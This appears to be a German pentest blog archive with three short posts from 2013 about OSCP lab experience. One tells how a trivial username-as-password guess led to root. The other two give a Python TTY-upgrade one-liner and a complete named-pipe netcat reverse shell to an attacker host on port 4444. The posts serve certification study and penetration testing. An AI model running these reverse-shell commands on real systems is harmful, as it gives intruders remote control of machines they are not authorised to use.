netcat

16 11, 2013

Erfahrungen zum OSCP: Teil 6 Manchmal kann es so simpel sein

von |16. November 2013|Pentest|0 Kommentare|

Manchmal kann es so simpel sein. Ich hatte auf einem Linux-Host eine nicht-privilegierte Reverse-Shell per netcat erlangt. Neben root existierte noch ein weiterer User. Nachdem ich mehrere Stunden erfolglos Zeit in die Privilege Escalation über Exploits investiert hatte, war ich kurz vorm Aufgeben für diesen Tag.

Aus purer Verzweiflung wagte ich ein „su username“ und gab einfach als Passwort den Benutzernamen ein. Nicht nur hatte das Erfolg, der Benutzer hatte auch uneingeschränkte sudo-Rechte auf diesem Host. In weniger als einer Minute war ich root.

Wenn man selbst sehr sensibilisiert mit dem Umgang von Passwörtern ist und weiß, wie man sichere Passwörter benutzt und auch einen Passwortsafe verwendet, verschränkt es manchmal ungemein den eigenen Blickwinkel. Irgendwann kommt man nicht mehr intuitiv auf die Idee, dass trivialste Passwort zu versuchen. Manchmal ist es wirklich so simpel.

16 11, 2013

Interaktive Reverse-Shell mit Netcat durch Python

von |16. November 2013|Pentest|0 Kommentare|

Eine Reverse-Shell mit netcat ist leider nicht interaktiv. Somit sind Tools wie sudo, mysql, su usw. nicht oder nur eingeschränkt benutzbar. Sofern auf dem Zielrechner Python installiert ist, lässt sich innerhalb der Netcat-Session einfach ein Terminal simulieren:

python -c ‚import pty; pty.spawn(„/bin/bash“)‘

28 10, 2013

Remote-Shell mit Netcat ohne „-e“ exec

von |28. Oktober 2013|Pentest|0 Kommentare|

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe:

kali# nc -nvlp 4444

host# mknod /tmp/pipe p

host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe

Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..